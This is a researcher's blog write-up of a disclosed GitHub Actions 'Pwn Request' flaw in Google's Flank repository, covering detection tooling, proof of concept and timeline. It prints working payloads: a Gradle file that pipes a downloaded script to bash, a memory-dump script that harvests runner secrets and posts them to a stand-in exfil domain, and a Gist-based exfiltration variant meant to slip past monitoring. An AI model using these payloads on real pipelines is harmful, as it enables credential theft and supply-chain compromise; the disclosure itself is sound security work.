An Obscure Actions Workflow Vulnerability in Google’s Flank

Introduction

Recently, I reported a “Pwn Request” vulnerability in Google’s Flank repository. Flank is described as a “Massively parallel Android and iOS test runner for Firebase Test Lab” and is an official Google open source project.

The vulnerability allowed anyone with a GitHub account to steal Google service account credentials stored as a repository secret, and to obtain a GITHUB_TOKEN with write access.

Google’s VRP rewarded me with a $7,500 bug bounty for this report as a Software Supply Chain compromise under the “Standard OSS Project” tier.

Actions injections and Pwn Request vulnerabilities are far from new, and exploiting them isn’t worthy of a blog post at this point, but there are some unique aspects to this particular vulnerability that I think are worth highlighting.

What is unique about this repository is how long it was vulnerable despite Google operating one of the best bug bounty programs in the industry. Most “textbook” Pwn Requests will be reported within days by bug bounty hunters; however, the vulnerability was introduced on Dec 17th, 2020 in this pull request. This means that for over three years no one identified this vulnerability despite a very high chance at a generous bug bounty payment!

How did I find it? I used an automated tool that I have been developing to discover this vulnerability. In this post I’ll cover how I discovered it, my PoC, the disclosure timeline, and provide some words of wisdom about how I think this bug class can be solved at scale.

Discovery & PoC

Gato-X

While with my previous employer, Praetorian, I led the development of a tool called Gato. The tool focused on self-hosted runners along with post-compromise enumeration and exploitation for GitHub classic personal access tokens.
At the same time, I had been bug bounty hunting on the side, using regular expressions to discover injection and Pwn Request vulnerabilities. I always had the feeling that I was missing obscure cases, and I was right.

I started adding detection for injection and Pwn Request attacks to my private fork of the tool. There are already tools for this vulnerability class, like Cycode Labs’ Raven and TinderSec’s gh-workflow-auditor; however, I took a different design approach and tackled the problem from an offensive perspective.

Instead of trying to audit workflows or generate actionable findings, my goal was to scan workflows that run on risky triggers at scale, and then work backwards from that to identify true positives:

Take 20 or 30 thousand repositories at a time and identify candidates for further review. I used sourcegraph.com/search for this.
False positives are ok, but provide context to quickly determine if something is interesting or not within a few seconds.
Avoid false negatives as much as possible.

Currently, the tool will take 20-30 thousand repositories and report roughly 2000 candidates. In the tool’s current state, roughly 70 percent are false positives. However, for the majority of false positives I can tell just by looking at the result. The best part? Gato-X performs this scan in only a few hours running on a laptop with a single GitHub Account.
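A first triage pass of this kind can be sketched in a few lines. This is a minimal illustration, not Gato-X's actual implementation: the trigger set and the function name `risky_triggers` are assumptions, and the match is a loose text search rather than a real YAML parse, which deliberately trades false positives for fewer false negatives.

```python
import re

# Triggers that run in the context of the base repository yet can be
# fired by an outside contributor (an illustrative, non-exhaustive set).
RISKY_TRIGGERS = {"issue_comment", "pull_request_target", "workflow_run", "issues"}


def risky_triggers(workflow_text: str) -> set[str]:
    """Return the risky trigger names that appear as whole words in the file.

    The match is intentionally loose: it can over-report (for example, a
    trigger name inside a comment), which is acceptable for a triage pass.
    """
    words = set(re.findall(r"[a-z_]+", workflow_text))
    return RISKY_TRIGGERS & words


sample = "on:\n  issue_comment:\n    types: [created]\n  push:\n"
print(risky_triggers(sample))
```

Anything this pass flags still needs the context described above (steps, variables, if checks) before a human can decide whether it is interesting.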

Below is the output Gato-X presented for Flank. Right off the bat, I can tell that:

The workflow ran on issue_comment (which includes comments on pull requests)
It referenced a pull request number by context expression within a run step that is called “Checkout Pull Request”

Just by seeing this output I knew it was worth investigating. Gato-X also provided a direct link to the HTML workflow, so I could click on it and investigate further.

                "pwn_request_risk": [],
                "injection_risk": [
                    {
                        "workflow_name": "run_integration_tests.yml",
                        "workflow_url": "https://github.com/Flank/flank/blob/master/.github/workflows/run_integration_tests.yml",
                        "details": {
                            "triggers": [
                                "issue_comment"
                            ],
                            "should_run_it": {
                                "Check if integrations tests should run": {
                                    "variables": [
                                        "env.run_it",
                                        "steps.check_issue_comment.outputs.triggered == 'true'"
                                    ]
                                }
                            },
                            "run-it-full-suite": {
                                "Checkout Pull Request": {
                                    "variables": [
                                        "needs.should_run_it.outputs.pr_number"
                                    ],
                                    "if_checks": "github.event_name == 'issue_comment'"
                                },
                                "if_check": "needs.should_run_it.outputs.run_integration_tests == 'true'"
                            },
                            "process-results": {
                                "Process IT results": {
                                    "variables": [
                                        "needs.run-it-full-suite.outputs.job_status"
                                    ]
                                },
                                "if_check": "always() && github.event_name != 'issue_comment'"
                            }
                        }
                    }
                ]
            },

You may notice that when Gato-X picked up the repository, it did not detect this as a Pwn Request, as the pwn_request_risk field is empty. This was because at the time, Gato-X did not have a specific detection for checking out the PR via the gh cli, but the context surrounding the use of the pr_number was enough to determine this repository was worth investigating.
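A detection for this case could be as simple as the sketch below. The patterns and the name `checks_out_pr` are assumptions made for illustration; they are not Gato-X's actual rules, and a real check would also need to handle multi-line commands and wrapper scripts.

```python
import re

# Commands that pull untrusted pull request code into the workspace.
# Hypothetical patterns for illustration only.
PR_CHECKOUT_PATTERNS = [
    re.compile(r"\bgh\s+pr\s+checkout\b"),      # GitHub CLI checkout of a PR
    re.compile(r"\bgit\s+fetch\b.*\bpull/"),    # fetching refs/pull/<n>/head
]


def checks_out_pr(run_script: str) -> bool:
    """Return True if any line of a run step looks like a PR checkout."""
    return any(
        pattern.search(line)
        for line in run_script.splitlines()
        for pattern in PR_CHECKOUT_PATTERNS
    )


print(checks_out_pr("gh pr checkout ${{ needs.should_run_it.outputs.pr_number }}"))
```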

Peculiar Checkout

What made this vulnerability unique is probably also why no one found it before. The workflow ran on issue_comment, but did not actually reference context variables typically called out in resources on Actions injection vulnerabilities.

First, the workflow retrieved the pull request’s URL from the event payload. Next, it parsed the PR number out of that URL by stripping everything up to the final slash. Finally, it set that number as the step’s output value.

      - name: Get PR number
        id: pr_number
        if: ${{ github.event_name == 'issue_comment' }}
        run: |
          PR_URL="${{ github.event.issue.pull_request.url }}"
          PR_NUMBER=${PR_URL##*/}
          echo "number=$PR_NUMBER" >> "$GITHUB_OUTPUT"
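For readers less familiar with shell parameter expansion, `${PR_URL##*/}` removes the longest prefix ending in a slash, leaving only the final path segment. The Python equivalent below is a small illustration; the function name and the sample URL (with placeholder OWNER/REPO and a made-up PR number) are assumptions.

```python
def pr_number_from_url(pr_url: str) -> str:
    """Mirror the shell expansion ${PR_URL##*/}: keep what follows the last '/'."""
    return pr_url.rsplit("/", 1)[-1]


# Hypothetical URL in the shape the issue_comment payload provides.
print(pr_number_from_url("https://api.github.com/repos/OWNER/REPO/pulls/1234"))  # prints 1234
```

The value produced here is only a number, which is part of why the step looks harmless in isolation; the risk comes from what is later done with it.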

A subsequent job then took the PR number, exposed as an output of the should_run_it job, and passed it via context expression to a run step that called gh pr checkout.

      - name: Checkout Pull Request
        if: github.event_name == 'issue_comment'
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        run: |
          gh pr checkout ${{ needs.should_run_it.outputs.pr_number }}

This highlights the importance of source-to-sink analysis when reviewing GitHub Actions workflows for vulnerabilities.
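As a rough sketch of what source-to-sink tracing means here, the snippet below walks run steps (the sinks), finds `needs.<job>.outputs.<name>` expressions, and resolves them to the expression the upstream job declared for that output (the source). The workflow is modeled as plain dictionaries, and the `outputs` mapping for should_run_it is an assumption, since that part of the Flank workflow is not shown above.

```python
import re

EXPR = re.compile(r"\$\{\{\s*(.*?)\s*\}\}")
NEEDS_OUTPUT = re.compile(r"needs\.([\w-]+)\.outputs\.([\w-]+)")


def trace_needs_outputs(jobs: dict) -> list[tuple[str, str, str, str]]:
    """Return (sink_job, sink_step, source_job, source_expression) tuples."""
    findings = []
    for job_name, job in jobs.items():
        for step in job.get("steps", []):
            for expr in EXPR.findall(step.get("run", "")):
                match = NEEDS_OUTPUT.fullmatch(expr)
                if match is None:
                    continue
                source_job, output_name = match.groups()
                declared = jobs.get(source_job, {}).get("outputs", {})
                source = declared.get(output_name, "<unknown>")
                findings.append((job_name, step.get("name", "?"), source_job, source))
    return findings


# Simplified model of the two jobs; the outputs mapping is assumed.
jobs = {
    "should_run_it": {
        "outputs": {"pr_number": "${{ steps.pr_number.outputs.number }}"},
        "steps": [{"name": "Get PR number", "run": "PR_NUMBER=${PR_URL##*/}"}],
    },
    "run-it-full-suite": {
        "steps": [{
            "name": "Checkout Pull Request",
            "run": "gh pr checkout ${{ needs.should_run_it.outputs.pr_number }}",
        }],
    },
}

for finding in trace_needs_outputs(jobs):
    print(finding)
```

A fuller analysis would keep following the source expression back through step outputs until it reaches an event context value.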

After the checkout, the workflow eventually ran integration tests which I was able to modify to prove that I could execute arbitrary code within the context of a privileged workflow.

Gato-X – Coming soon to all!

I hope to open source an alpha version of Gato-X soon. My current goal is to cut down the false positive rates by building an expression tree from each if check and evaluating it in the context of an external actor triggering the event.

I can’t wait to release it, because the combination of the tool’s speed and its ability to find obscure cases makes it possible for security professionals to identify these issues within hours, at a scale that was not possible before.
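To make the if-check idea concrete, here is a minimal sketch of evaluating an expression from the point of view of an external actor. It is an assumption-laden illustration, not the planned Gato-X design: it supports only `==`, `!=`, `!`, `&&`, `||`, parentheses, string literals, and zero-argument calls such as `always()`, and it uses three-valued logic where `None` means the scanner cannot determine the value.

```python
import re

# Operators, single-quoted strings, and dotted names (hyphens allowed in job ids).
TOKEN = re.compile(r"\s*(?:(&&|\|\||==|!=|!|\(|\))|'([^']*)'|([\w.\-]+))")


def tokenize(expr):
    tokens, pos, expr = [], 0, expr.strip()
    while pos < len(expr):
        m = TOKEN.match(expr, pos)
        if m is None:
            raise ValueError(f"unexpected input: {expr[pos:]!r}")
        op, literal, name = m.groups()
        if op is not None:
            tokens.append(("op", op))
        elif literal is not None:
            tokens.append(("str", literal))
        else:
            tokens.append(("name", name))
        pos = m.end()
    return tokens


def truthy(value):
    """Three-valued truthiness: None means 'unknown to the scanner'."""
    return None if value is None else bool(value)


def k_and(a, b):
    a, b = truthy(a), truthy(b)
    if a is False or b is False:
        return False
    return True if a and b else None


def k_or(a, b):
    a, b = truthy(a), truthy(b)
    if a or b:
        return True
    return False if a is False and b is False else None


def evaluate(expr, ctx):
    """Evaluate an if check given the context values an outsider can pin down."""
    tokens, pos = tokenize(expr), 0

    def peek():
        return tokens[pos] if pos < len(tokens) else (None, None)

    def take():
        nonlocal pos
        tok = peek()
        pos += 1
        return tok

    def primary():
        kind, text = take()
        if kind == "str":
            return text
        if (kind, text) == ("op", "("):
            value = or_expr()
            take()  # closing parenthesis
            return value
        if kind == "name" and peek() == ("op", "("):
            take(); take()  # consume "()" of a zero-argument call
            return True if text == "always" else None
        if kind == "name":
            return ctx.get(text)  # None when the value is not known
        raise ValueError(f"unexpected token: {text!r}")

    def comparison():
        left = primary()
        if peek() in (("op", "=="), ("op", "!=")):
            _, op = take()
            right = primary()
            if left is None or right is None:
                return None
            return (left == right) if op == "==" else (left != right)
        return left

    def not_expr():
        if peek() == ("op", "!"):
            take()
            value = truthy(not_expr())
            return None if value is None else not value
        return comparison()

    def and_expr():
        value = not_expr()
        while peek() == ("op", "&&"):
            take()
            value = k_and(value, not_expr())
        return value

    def or_expr():
        value = and_expr()
        while peek() == ("op", "||"):
            take()
            value = k_or(value, and_expr())
        return value

    return truthy(or_expr())


actor = {"github.event_name": "issue_comment"}  # assumed attacker-reachable context
print(evaluate("always() && github.event_name != 'issue_comment'", actor))
```

With this context, the "Checkout Pull Request" check from the Flank output evaluates to True, the process-results check evaluates to False, and a check that depends on an upstream job output stays unknown, so only the last kind would still need manual review.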

Proof of Concept

On February 27th at 10:45 EST, I created a draft pull request containing my payload and confirmed both the vulnerability and access to the application token secret.

I want to give a shout out to Boost Security’s Living off the Pipeline Project. I was able to use an off-the-shelf payload for Gradle as my code injection point. Projects like LoTP make it easier for security researchers to prove vulnerabilities but also give developers a list of files they should be careful to make sure external actors cannot modify if workflows are running on risky triggers.

The workflow had access to a secret and then kicked off integration tests using gradle/gradle-build-action.

I modified the settings.gradle.kts file within my fork to pull down code from a file and pipe it to bash.

// For VRP Test, not malicious.
fun String.runCommand(): String? = try {
    ProcessBuilder("/bin/sh", "-c", this)
        .redirectOutput(ProcessBuilder.Redirect.PIPE)
        .redirectError(ProcessBuilder.Redirect.PIPE)
        .start()
        .inputStream.bufferedReader().readText()
} catch (e: Exception) {
    e.printStackTrace()
    null
}

val output = "curl -sSfL https://github.com/Flank/flank/raw/88e5a56dd3ed78f4f192eadf31634c013dbbf060/README | bash".runCommand()
println("Shell command output: $output")

This payload allowed me to obtain access to a GITHUB_TOKEN with write access and the application secret. Once I prepared the payload, I created a draft pull request and commented @flank-it. This triggered execution of the workflow in the context of the default branch.

Shortly after, I received the secrets in the form of a Gist.

Detection by Harden-Runner

If you looked at my payload, you probably noticed that I was downloading a raw file from the base repository called README. Normally, I would just host the following payload in a Gist and pipe it to Bash, like so:

# Replace with Burp collaborator domain or similar.
YOUR_EXFIL="your-exfil-domain.com"

# Uses memory dump technique from github.com/nikitastupin/pwnhub / with regex to parse out all secret values (including GITHUB_TOKEN)
if [[ "$OSTYPE" == "linux-gnu" ]]; then
  B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0`
  # Exfil to Burp
  curl -s -d "$B64_BLOB" https://$YOUR_EXFIL/token > /dev/null
else
  exit 0
fi

For Flank, I got a little creative because I noticed that the workflow was using StepSecurity’s Harden-Runner in audit mode. Since Harden-Runner was in audit mode, I didn’t have to be sneaky to prove the vulnerability, but I wanted to see if I could get around the detection as an exercise.

Commit in Network of Forks

I committed two files to my fork. The first was a Bash script, and the other was a copy of Nikita Stupin’s excellent memory dumping script which I’ve used extensively over the past few months.

In GitHub, any commit in a fork is also within the base repository. This means you can access the same commit hash from the fork repository or the base. This is why my payload referenced a file from the base repository.

val output = "curl -sSfL https://github.com/Flank/flank/raw/88e5a56dd3ed78f4f192eadf31634c013dbbf060/README | bash".runCommand()
println("Shell command output: $output")

Exfiltrate to Secret Gist

Since Harden Runner picks up requests to anomalous URLs, instead of simply exfiltrating the encoded blob to Burp, I used the GitHub API along with a fine-grained PAT (which I quickly revoked after the PoC) to upload the GCloud application token and GITHUB_TOKEN to a secret Gist.

if [[ "$OSTYPE" == "linux-gnu" ]]; then
  B64_BLOB=`curl -sSfL https://github.com/flank/flank/raw/128b43b61fd7da13ea6829d1fbb4d3f028b6cdad/LICENSE | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0`
  YEETER_TOKEN="<EXFIL TOKEN>"
  YEETER_TOKEN_DECODED=`echo $YEETER_TOKEN | base64 -d | base64 -d`

  curl -L \
    -X POST \
    -H "Accept: application/vnd.github+json" \
    -H "Authorization: Bearer $YEETER_TOKEN_DECODED" \
    -H "X-GitHub-Api-Version: 2022-11-28" \
    https://api.github.com/gists -d '{"public":false,"files":{"Spoils":{"content":"'$B64_BLOB'"}}}'

  sleep 900
else
  exit 0
fi

This exfiltration method is very useful for exploiting Actions vulnerabilities because all traffic goes to GitHub. It’s even more useful on self-hosted runners, where the runner may sit in an environment with strong egress controls.

Did it work?

Harden-Runner actually did detect one anomalous request during my PoC, which was impressive. I had thought that using a commit from the base repository would have masked the behavior, but the issue was that the call to raw.githubusercontent itself was anomalous within that workflow as seen on the insights page. Had harden-runner been in block mode, it would have blocked the initial download of the payload and I would have had to scramble to update it to use a different method or just hardcode the full payload in the pull request.

This is important! In a real-world supply chain attack scenario, alerting on the attacker’s first exploit attempt can place security teams on notice, so even if the attacker re-exploited and successfully captured the application token, a security team can contain the attacker by revoking secrets and temporarily disabling Actions while they assess the breach. Supply chain attacks are unique in that they are usually delayed-fuse attacks: if a security team can catch an attacker in the act, it is unlikely the attacker will be able to cause any long-term damage.

In hindsight, I should have used GitHub’s API to retrieve the file at that commit, parsed the Base64 content blob out of the JSON response, and then piped that into Bash. This would have avoided the anomalous event. I could have gone even further and done it in Java, because then both the destination and the URL would match the baseline.
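For context on the parsing step mentioned above: GitHub's repository contents endpoint returns a JSON document whose `content` field holds the file as Base64 text (wrapped across lines) with `encoding` set to `base64`. The sketch below only shows the decoding; it makes no network request, and the sample response is built locally with a harmless placeholder body. The function name is an assumption.

```python
import base64
import json


def decode_contents_response(body: str) -> bytes:
    """Decode the file body from a contents-API style JSON response."""
    doc = json.loads(body)
    if doc.get("encoding") != "base64":
        raise ValueError("expected a base64-encoded file body")
    # The Base64 text is line-wrapped; b64decode ignores the newlines by default.
    return base64.b64decode(doc["content"])


# Locally constructed stand-in for an API response (placeholder content).
sample_body = json.dumps({
    "encoding": "base64",
    "content": base64.encodebytes(b"echo hello\n").decode("ascii"),
})
print(decode_contents_response(sample_body))
```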

No defensive product can prevent every single exfiltration or attack vector, but I was definitely impressed with Harden Runner as a security solution for GitHub Actions workflows.

Right now, if an attacker gets inside a workflow execution via a Pwn Request or supply chain attack on an upstream dependency, or even Actions cache poisoning (stay tuned – I’ve got a lot more on that coming soon), then there isn’t anything there to detect or stop them.

Disclosure Timeline

February 27th, 2024 – Report sent to Google VRP
February 28th, 2024 – Report Accepted
March 5th, 2024 – Awarded $7,500 Bounty
March 11th, 2024 – Workflow fixed by Google in https://github.com/Flank/flank/pull/2482
April 3rd, 2024 – Informed Google of plans to publish blog post mid-April and shared draft. Received word that I am good to publish.
April 15th, 2024 – Blog published.

As always, I had a very good experience reporting this bug to Google’s VRP.

References

https://boostsecurityio.github.io/lotp/ – Boost Security’s Living off the Pipeline Project
https://github.com/step-security/harden-runner – StepSecurity Harden Runner
https://github.com/nikitastupin/pwnhub – Nikita Stupin’s Pwnhub Repository

Adnan Khan's Blog